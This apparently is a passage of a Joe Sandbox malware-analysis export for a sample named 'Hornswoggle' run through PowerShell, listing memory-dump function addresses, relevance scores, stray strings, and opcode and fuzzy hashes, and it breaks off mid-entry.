Associated: 00000000.00000002.2031001950.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: ca0b18bb87844b4bf03c2f7d3918b69422ab9094ff5260ece92dc9b1c2472986
Instruction ID: 761e0a114986e2dc795515ee57e72db75caae44d6787476300dd9688655b7936
Opcode Fuzzy Hash: ca0b18bb87844b4bf03c2f7d3918b69422ab9094ff5260ece92dc9b1c2472986
Instruction Fuzzy Hash: 2FF06232605518BFC7129FA5DC40D9EBBA8EF16350B2541B5F800F7250D674EE019FA9

Analysis Process: powershell.exePID: 6600, Parent PID: 4996COMMON

Executed Functions

Function 074DCB4F Relevance: 14.7, Strings: 11, Instructions: 993COMMON

Download Yara Rule

Strings

x.nk, xrefs: 074DDC0B
4'jq, xrefs: 074DD095
4zl, xrefs: 074DD724
(f}l, xrefs: 074DDA3B
4zl, xrefs: 074DD72E
x.nk, xrefs: 074DD2BB
-nk, xrefs: 074DD300
(f}l, xrefs: 074DDA51
4'jq, xrefs: 074DD822
4'jq, xrefs: 074DD0A1
4'jq, xrefs: 074DD838

Memory Dump Source

Source File: 00000002.00000002.4494071074.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_74d0000_powershell.jbxd

Similarity

API ID:
String ID: (f}l$(f}l$4'jq$4'jq$4'jq$4'jq$4zl$4zl$x.nk$x.nk$-nk
API String ID: 0-1824100673
Opcode ID: 13a4b6506708066193825b16859fa78134739f010aa3790bee39d40b1d0fd49c
Instruction ID: 54cf4aeb219c1713f66b1772f737bb80534d1b460a596cfd95912649c571ff1f
Opcode Fuzzy Hash: 13a4b6506708066193825b16859fa78134739f010aa3790bee39d40b1d0fd49c
Instruction Fuzzy Hash: 209250B4B00214DFD714CB58C991BEABBB2EB85304F1185D6D909AB355CB72EE81CFA1

Function 074D64A8 Relevance: 13.3, Strings: 10, Instructions: 843COMMON

Download Yara Rule

Strings

4'jq, xrefs: 074D6D4A
tPjq, xrefs: 074D6558
-nk, xrefs: 074D6FFA
4'jq, xrefs: 074D6D56
(f}l, xrefs: 074D7D0B
4'jq, xrefs: 074D753F
4'jq, xrefs: 074D754B
(f}l, xrefs: 074D7D01
tPjq, xrefs: 074D654C
x.nk, xrefs: 074D6FB5

Memory Dump Source

Source File: 00000002.00000002.4494071074.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_74d0000_powershell.jbxd

Similarity

API ID:
String ID: (f}l$(f}l$4'jq$4'jq$4'jq$4'jq$tPjq$tPjq$x.nk$-nk
API String ID: 0-2889602837
Opcode ID: 79a147a9f052926651d5a68b11697b87967414bb1f2bdf43248e0a729e422800
Instruction ID: 9d7f5190b834a83c98c4d3473cb1d65f8c002a3e91d968052fdbc167442c4f45
Opcode Fuzzy Hash: 79a147a9f052926651d5a68b11697b87967414bb1f2bdf43248e0a729e422800
Instruction Fuzzy Hash: E472BFB4B002159FD714CB58CA61BEABBB2EF85300F15C49AD948AF351CB72ED85CB91

Function 074D7EA8 Relevance: 10.4, Strings: 8, Instructions: 373COMMON

Download Yara Rule

Strings

(f}l, xrefs: 074D7FD3
x.nk, xrefs: 074D827C
4'jq, xrefs: 074D8230
(f}l, xrefs: 074D7FC9
4'jq, xrefs: 074D823C
4'jq, xrefs: 074D81B1
4'jq, xrefs: 074D81BD
-nk, xrefs: 074D82C1

Memory Dump Source

Source File: 00000002.00000002.4494071074.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_74d0000_powershell.jbxd

Similarity

API ID:
String ID: (f}l$(f}l$4'jq$4'jq$4'jq$4'jq$x.nk$-nk
API String ID: 0-1987253473
Opcode ID: adc732354de2f8f11e20b832f5a824da0249a725cf02c4c32c6c4b4e60955535
Instruction ID: 278b33e6538c12834d3caef2d7687fa4ea2e9e00198350880ab95f0e123506ca
Opcode Fuzzy Hash: adc732354de2f8f11e20b832f5a824da0249a725cf02c4c32c6c4b4e60955535
Instruction Fuzzy Hash: F7E1ADB0A002059FC714CB68C560BEEBBBAEF88304F15842AD9416F395CB75EC46CBA1

Function 074D7E80 Relevance: 6.6, Strings: 5, Instructions: 318COMMON

Download Yara Rule

Strings

x.nk, xrefs: 074D827C
4'jq, xrefs: 074D8230
(f}l, xrefs: 074D7FC9
4'jq, xrefs: 074D81B1
-nk, xrefs: 074D82C1

Memory Dump Source

Source File: 00000002.00000002.4494071074.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_74d0000_powershell.jbxd

Similarity

API ID:
String ID: (f}l$4'jq$4'jq$x.nk$-nk
API String ID: 0-2884991839
Opcode ID: 647f3de402d23db8f81edca5e01a6396a3abd392c2a40bfe505efc1e559088ee
Instruction ID: dc4a33cd3efb7ebd0a5c2c4e1cf4fc0b90791e683f23255cbe0da06f657ff407
Opcode Fuzzy Hash: 647f3de402d23db8f81edca5e01a6396a3abd392c2a40bfe505efc1e559088ee
Instruction Fuzzy Hash: 96C19EB0A002059FC714CF68C960BEEBBB6EF89304F15845AD5456F396CB75EC46CBA1

Function 074D2070 Relevance: 5.6, Strings: 4, Instructions: 598COMMON

Download Yara Rule

Strings

4'jq, xrefs: 074D2508
4'jq, xrefs: 074D23B8
4'jq, xrefs: 074D2512
4'jq, xrefs: 074D23AE

Memory Dump Source

Source File: 00000002.00000002.4494071074.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_74d0000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$4'jq$4'jq$4'jq
API String ID: 0-4000621977
Opcode ID: a6bbed13d259cafd36b56c3155dea90bb7f1b92c2fee8c70ce98ea999c260d01
Instruction ID: b718751e6e1306f3226dead8d9604904d5914c1d2d75d8820c9fa007f261265c
Opcode Fuzzy Hash: a6bbed13d259cafd36b56c3155dea90bb7f1b92c2fee8c70ce98ea999c260d01
Instruction Fuzzy Hash: A01267B17042128FCB118B6889216EBBBA6FFC1311F14847BD985DB351DBB6DD42C7A2

Function 074DD51F Relevance: 5.4, Strings: 4, Instructions: 425COMMON

Download Yara Rule

Strings

x.nk, xrefs: 074DDC0B
4zl, xrefs: 074DD724
(f}l, xrefs: 074DDA3B
4'jq, xrefs: 074DD822

Memory Dump Source

Source File: 00000002.00000002.4494071074.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_74d0000_powershell.jbxd

Similarity

API ID:
String ID: (f}l$4'jq$4zl$x.nk
API String ID: 0-2674544615
Opcode ID: 77244fb1cfdbd191f741f8f40a18c45fe51da57d367ca682bc1fc645cd8246e9
Instruction ID: 33aa6c53ccc9fdcd877478ef553d474fb09e3cf2a644a692692beec51fd1da0f
Opcode Fuzzy Hash: 77244fb1cfdbd191f741f8f40a18c45fe51da57d367ca682bc1fc645cd8246e9
Instruction Fuzzy Hash: 67125AB4B00215DFDB24CB58C9A1BEAB7B2EB85304F11C5D6D449AB351CB72AE81CF91

Function 074DD509 Relevance: 5.3, Strings: 4, Instructions: 331COMMON

Download Yara Rule

Strings

x.nk, xrefs: 074DDC0B
4zl, xrefs: 074DD724
(f}l, xrefs: 074DDA3B
4'jq, xrefs: 074DD822

Memory Dump Source

Source File: 00000002.00000002.4494071074.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_74d0000_powershell.jbxd

Similarity

API ID:
String ID: (f}l$4'jq$4zl$x.nk
API String ID: 0-2674544615
Opcode ID: 454990c130d29c31902b552c8dfb5d50afdd6b3e3670c5052c7fc2536f25f411
Instruction ID: a78d6d1ead480f19345d41cfa0325df3915ddd1e13278d22b915e9f93bf7ad9d
Opcode Fuzzy Hash: 454990c130d29c31902b552c8dfb5d50afdd6b3e3670c5052c7fc2536f25f411
Instruction Fuzzy Hash: 23E127B0B00215DFDB24CB58C991BEAB7B2EB85304F1185D6D449AB351CB72AE81CF91

Function 074D7090 Relevance: 4.4, Strings: 3, Instructions: 647COMMON

Download Yara Rule

Strings

4'jq, xrefs: 074D6D4A
-nk, xrefs: 074D6FFA
x.nk, xrefs: 074D6FB5

Memory Dump Source

Source File: 00000002.00000002.4494071074.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_74d0000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$x.nk$-nk
API String ID: 0-1146655647
Opcode ID: 910f0027c039c3dd7f411078f756897eb12cb60c83c671e7de9fb73b816f98c4
Instruction ID: 05ea992cfd355bbf6c354dd11fab560c75fe499517f76ee135d846a98525071c
Opcode Fuzzy Hash: 910f0027c039c3dd7f411078f756897eb12cb60c83c671e7de9fb73b816f98c4
Instruction Fuzzy Hash: A5527FB4B00215DFD724CB18CA91BAABBB2EB85304F15C499D948AF351CB72ED85CF91

Function 074DD399 Relevance: 4.4, Strings: 3, Instructions: 620COMMON

Download Yara Rule

Strings

4'jq, xrefs: 074DD095
x.nk, xrefs: 074DD2BB
-nk, xrefs: 074DD300

Memory Dump Source

Source File: 00000002.00000002.4494071074.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_74d0000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$x.nk$-nk
API String ID: 0-1146655647
Opcode ID: c37a37c0e64d22e0de454431567e7439ec2ed9c00d5e14ca573a3b7a68933fe9
Instruction ID: 8b66169ca73bed53c6e3b92e4db602bce655aec98cf0e53d02c5837146e342df
Opcode Fuzzy Hash: c37a37c0e64d22e0de454431567e7439ec2ed9c00d5e14ca573a3b7a68933fe9
Instruction Fuzzy Hash: 624261B4B102149FD710CB58C991BEABBB2EB89304F1185D5D909AF351CB72EE41CFA1

Function 074DD480 Relevance: 4.2, Strings: 3, Instructions: 467COMMON

Download Yara Rule

Strings

4'jq, xrefs: 074DD095
x.nk, xrefs: 074DD2BB
-nk, xrefs: 074DD300

Memory Dump Source

Source File: 00000002.00000002.4494071074.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_74d0000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$x.nk$-nk
API String ID: 0-1146655647
Opcode ID: cda68e4ad88eb0253f5e7da65eb6fa2035b04a6d8448cb2a54578df13e8da26f
Instruction ID: a5f17b5781d7b78abfc1e2b3be30e7bfff5f686f4cf7a0db18216f9d083c668c
Opcode Fuzzy Hash: cda68e4ad88eb0253f5e7da65eb6fa2035b04a6d8448cb2a54578df13e8da26f
Instruction Fuzzy Hash: 9E1270B0B102149FD714DB58C991BEABBB2EB89304F118595D909AF391CB72EE41CFA1

Function 074D3E00 Relevance: 3.9, Strings: 3, Instructions: 124COMMON

Download Yara Rule

Strings

$jq, xrefs: 074D3E23
$jq, xrefs: 074D3E5B
$jq, xrefs: 074D3E67

Memory Dump Source

Source File: 00000002.00000002.4494071074.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_74d0000_powershell.jbxd

Similarity

API ID:
String ID: $jq$$jq$$jq
API String ID: 0-3696375380
Opcode ID: db04b50da5424cfa45be9ebf0222a078cdcf28a759dd9865a14fecb86ca2c222
Instruction ID: 8ab4b6c856e36b763fe5972b4f8dc10a6da43b4da81874a0d99f2e8243dafed9
Opcode Fuzzy Hash: db04b50da5424cfa45be9ebf0222a078cdcf28a759dd9865a14fecb86ca2c222
Instruction Fuzzy Hash: 294118B2B00226DBCB149E69D9502EBF7E5EF88211B14852FD845E7385DB31DD01C7E2

Function 074D3DE0 Relevance: 2.6, Strings: 2, Instructions: 81COMMON

Download Yara Rule

Strings

$jq, xrefs: 074D3E23
$jq, xrefs: 074D3E5B

Memory Dump Source

Source File: 00000002.00000002.4494071074.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_74d0000_powershell.jbxd

Similarity

API ID:
String ID: $jq$$jq
API String ID: 0-3720491408
Opcode ID: 8ebbd110c3897be773166f04c06e7fbf4fcf9fcdcc5f33cebbd721fbf0b3a844
Instruction ID: e0b5f6754ac41739fd7a444994838bda96fcd59fffb430aceb32408cadf9b01e
Opcode Fuzzy Hash: 8ebbd110c3897be773166f04c06e7fbf4fcf9fcdcc5f33cebbd721fbf0b3a844
Instruction Fuzzy Hash: 412129B2905396CFCB118F68C9501E7BBB0AF4A210718469BD898E73C2D3309D40C7E2

Function 074D8348 Relevance: 1.4, Strings: 1, Instructions: 102COMMON

Download Yara Rule

Strings

x.nk, xrefs: 074D83FA

Memory Dump Source

Source File: 00000002.00000002.4494071074.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_74d0000_powershell.jbxd

Similarity

API ID:
String ID: x.nk
API String ID: 0-2617426556
Opcode ID: ea9836b9ab2043740c877d41899b42cdf7dcaeffe31ec787ce4f12d49c90fa54
Instruction ID: 809f0d050890b76dc4671ef99ab33506cf312e560491471bbd9f3a166efa66dd
Opcode Fuzzy Hash: ea9836b9ab2043740c877d41899b42cdf7dcaeffe31ec787ce4f12d49c90fa54
Instruction Fuzzy Hash: 4E31C0B0B40200AFD7049B68C965BEF7AABDF85300F118415E9016F7A5CFB6AC05CBE1

Function 074D45D8 Relevance: .5, Instructions: 469COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4494071074.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_74d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 686225eb94641c3589404639eca91852786c490e64f36987befe31763cf0f620
Instruction ID: 5a7f696e875eb147f0ad02da1dd422d6964a0b562997bc8a24e1c91044fbd7d8
Opcode Fuzzy Hash: 686225eb94641c3589404639eca91852786c490e64f36987befe31763cf0f620
Instruction Fuzzy Hash: 7B129EB4B002059FD714CB98D6A4EAABBF2EF85304F15C066E9459F351CB72EC42CB91

Function 074D45BC Relevance: .4, Instructions: 420COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4494071074.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_74d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fede46ba2f10a7b9178c6bc60663b265bd5e16163de976999995fb8c6dc92b56
Instruction ID: 563c0576b350f8b7b22ef3c87d92cb33314427b8db48d11d08453eea0cadce5b
Opcode Fuzzy Hash: fede46ba2f10a7b9178c6bc60663b265bd5e16163de976999995fb8c6dc92b56
Instruction Fuzzy Hash: 8E028BB4B002459FD710CF98C694EAABBF2EF89314F15C0AAE9559B351C772EC42CB91

Function 0312731A Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4490014066.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3120000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7ef0de41356cdf2f0fe46cb71a482c3f9c767706af79703e40c30db18d9b91c
Instruction ID: cdb762aa125fc812c630056225367bc25fb4259b797055ebad10da931271180c
Opcode Fuzzy Hash: f7ef0de41356cdf2f0fe46cb71a482c3f9c767706af79703e40c30db18d9b91c
Instruction Fuzzy Hash: 4FA1A035A00218CFCB14DFA5D944A9EBBF6FF88310F158558E806AB3A5CB34AD59CB80

Function 074D8B70 Relevance: .2, Instructions: 230COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4494071074.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_74d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98bb482da359d5ae0b30fbc1a7cc9162c0757798beba4a674c26d3d04bad9b2e
Instruction ID: 91fafa8df2499bf5325923d3f3d7aa937905a3ab0de8b9c9b74ede9d5cd97622
Opcode Fuzzy Hash: 98bb482da359d5ae0b30fbc1a7cc9162c0757798beba4a674c26d3d04bad9b2e
Instruction Fuzzy Hash: EF7144F1700206DFCB209A6999212FBBBE9EF85211F18847BD896CB381DB31DD41C7A1

Function 03122AA0 Relevance: .2, Instructions: 212COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4490014066.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3120000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5715cfcd9da628ceef9fe2ce6726ea6d0895a5d2da692e998c8b99a2889cfdb3
Instruction ID: 9ff9f236d2b52a71e44aa0bf73d4a4d3b27ce75973e732076caf2385e4ec4714
Opcode Fuzzy Hash: 5715cfcd9da628ceef9fe2ce6726ea6d0895a5d2da692e998c8b99a2889cfdb3
Instruction Fuzzy Hash: E7917E70A002198FCB15CF58C5D49AEFFB5FF49310B288599D815AB3A5C735EDA2CBA0

Function 03127A53 Relevance: .2, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4490014066.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3120000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e350be634ea08fa61ca083ecc474ba499c4369546ec13eedd036b99c2c38be6
Instruction ID: ab9c46ecbd8c420ee9bef0bf34121f525205910d83e262ff7954aad97e39af93
Opcode Fuzzy Hash: 1e350be634ea08fa61ca083ecc474ba499c4369546ec13eedd036b99c2c38be6
Instruction Fuzzy Hash: 2E719030A002189FCB14DFA9D880ADEBBF6FF89314F158469D4059B7A6CB71AD46CB90

Function 0312D627 Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4490014066.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3120000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 008814888ff2cd987548563f5a016e769e14d6fc47e1069ec3d0fd13d7e28147
Instruction ID: 7396998563f404ea7d6740a5ead77ee6cea4eff32691f2cb40a44c6f7d0dc137
Opcode Fuzzy Hash: 008814888ff2cd987548563f5a016e769e14d6fc47e1069ec3d0fd13d7e28147
Instruction Fuzzy Hash: 8F51F9306002448FD705EF39D9546AEBFF6FF89310F1984AAD8459B3A6CB389C46CB60

Function 074D2050 Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4494071074.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_74d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67ca2c901186ebad5d28dd9220f4e28b9f769cc4b2186a5d89216eedc970e0f7
Instruction ID: 9cd95e643ee0af56d4e9c22e6bba1ec0621bb4507e80d1a2e1dbd3e285802f8a
Opcode Fuzzy Hash: 67ca2c901186ebad5d28dd9220f4e28b9f769cc4b2186a5d89216eedc970e0f7
Instruction Fuzzy Hash: 51413AF1604202CFCB118F648A216FB7BE2BF85211F09859BDA849F352D7B5DD45C7A2

Function 031277F9 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4490014066.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3120000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f749c5a3f2efc0246161f8d1ebc831f542e8e81e2e91658e20fa6c3dd4349b4d
Instruction ID: df1a462d9a77491b98ff3a8562ccc84103fb3ad58e0a709b60630b8fe6809340
Opcode Fuzzy Hash: f749c5a3f2efc0246161f8d1ebc831f542e8e81e2e91658e20fa6c3dd4349b4d
Instruction Fuzzy Hash: 4441A134A002548FDB15DB24C954AAEBFF6EF8D350F095468E906EB7A1DF35AC41CB90

Function 0312D680 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4490014066.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3120000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad7065a26d45ff1d28eb64897d333735feba17552c9132f4b932a2fbcb401485
Instruction ID: 8ec86d8de9763a6635c0fa6f1f325d1b3fb743edc4159b16c16783e915151da0
Opcode Fuzzy Hash: ad7065a26d45ff1d28eb64897d333735feba17552c9132f4b932a2fbcb401485
Instruction Fuzzy Hash: 85415D70A002089FDB04DB79D9547AEBAF7AF88310F18C469D805AB7A9CF359C459BA0

Function 03122BB0 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4490014066.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3120000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8eaacbbb35aeca175a6be2fe377f1f7f5894eeb7d1abfb0224aaafc03d789e2
Instruction ID: e3938f8e1bb7157edc70798c900b2b4e5975680b6ed137d828f50ddd85611ba8
Opcode Fuzzy Hash: a8eaacbbb35aeca175a6be2fe377f1f7f5894eeb7d1abfb0224aaafc03d789e2
Instruction Fuzzy Hash: 49414874A002198FCB05CF58C594AAEFBB5FF49310B1585A9D805AB364C736FDA2CBA0

Function 03127810 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4490014066.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3120000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 855f201d94fe22c063ede35aef29f49884bb8dfbafa7b5c048d9630d304167bd
Instruction ID: b95a142d45a1c0314d436071a0b5d52e220fde9658a906ec1731c42c99d17e54
Opcode Fuzzy Hash: 855f201d94fe22c063ede35aef29f49884bb8dfbafa7b5c048d9630d304167bd
Instruction Fuzzy Hash: 83417F34A002148FDB18DB24C954AAEBBF6EF8D350F095468E906EB7A1DF35AD41CB90

Function 074D8B50 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4494071074.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_74d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b9f86ec028c0c5a77eb4541532cc48bec44dd8905aa6bf5b9e95f135cbbc527
Instruction ID: a87f7f49eadfd8168bc7eb45ed11fdf99afb5d3f4ed951679725f2be3e7a3c8d
Opcode Fuzzy Hash: 7b9f86ec028c0c5a77eb4541532cc48bec44dd8905aa6bf5b9e95f135cbbc527
Instruction Fuzzy Hash: C42135F5705346DFCB108B249A227FA7BA59B81641F0840A3D981CF392D736AE45C3E2

Function 00F1F520 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4489775108.0000000000F1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f1d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8016d51adc2714e74cf9b367a1bf363dfe53adb0b8d0ffed2f05354a02a0c0fc
Instruction ID: 255eefecb4cbd99a9d77dbb78e6615f95cd0518fb9e70bbe3d8fdb24d6f6a354
Opcode Fuzzy Hash: 8016d51adc2714e74cf9b367a1bf363dfe53adb0b8d0ffed2f05354a02a0c0fc
Instruction Fuzzy Hash: 4D21F776500200DFCF05CF14D9C0B56BF66FB88314F28C5B9E9094A256C336D89AEB61

Function 03122D3D Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4490014066.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3120000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e84f911b326fb707dacb4c061b94859659e251c2ce7d270a03369254f68e3b4
Instruction ID: 6a62cbf0ab4366f1a481d760ae822d8a10280538bcf6264cbebb6348bf5de82e
Opcode Fuzzy Hash: 7e84f911b326fb707dacb4c061b94859659e251c2ce7d270a03369254f68e3b4
Instruction Fuzzy Hash: A021E5356052559FCB06CF68C4A09FDFB71EF49320B194196C4519B2A6C737ED52CBA0

Function 00F1F51B Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4489775108.0000000000F1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f1d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 057d58c605ff61dcea1d2f362fa95e4b0c0d59dde82fc64a3d1dc629ed531e57
Instruction ID: 548e248db7742bd8b6bc52f9962a8bc6575bf90e6efca1929d54dfc619d74141
Opcode Fuzzy Hash: 057d58c605ff61dcea1d2f362fa95e4b0c0d59dde82fc64a3d1dc629ed531e57
Instruction Fuzzy Hash: FA21C076904240DFCF06CF10D5C4B15BF72FB48324F28C5A9D9094A256C336D85ADB91

Function 00F1D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4489775108.0000000000F1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f1d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0dfafa0beb053332cb22254d23ce31b824d6f791429eb44c56f402385c6e5825
Instruction ID: e6472fba4cf69f876b3980a675bb9d2e064b9901a8f5ac641a5c12a1200afb3e
Opcode Fuzzy Hash: 0dfafa0beb053332cb22254d23ce31b824d6f791429eb44c56f402385c6e5825
Instruction Fuzzy Hash: 9201DB72805344DED7209A1ACDC4BA7FFACEF59374F18C429ED480B24AC2799885D6B1

Function 0312A99B Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4490014066.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3120000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c450511448db6de04019dfb5ed5c627dc09be631a9a066a01ea8ee8a87cd277
Instruction ID: 37a1fd227b32a4485b89dbbfde4e7d060c7ad047f0ea92ea7c161b1087b60fcc
Opcode Fuzzy Hash: 9c450511448db6de04019dfb5ed5c627dc09be631a9a066a01ea8ee8a87cd277
Instruction Fuzzy Hash: 65017174A402189FCB00DB99D4806ADFB65FF8D200B248199D55A97361CA35EC43DB50

Function 0312F510 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4490014066.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3120000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
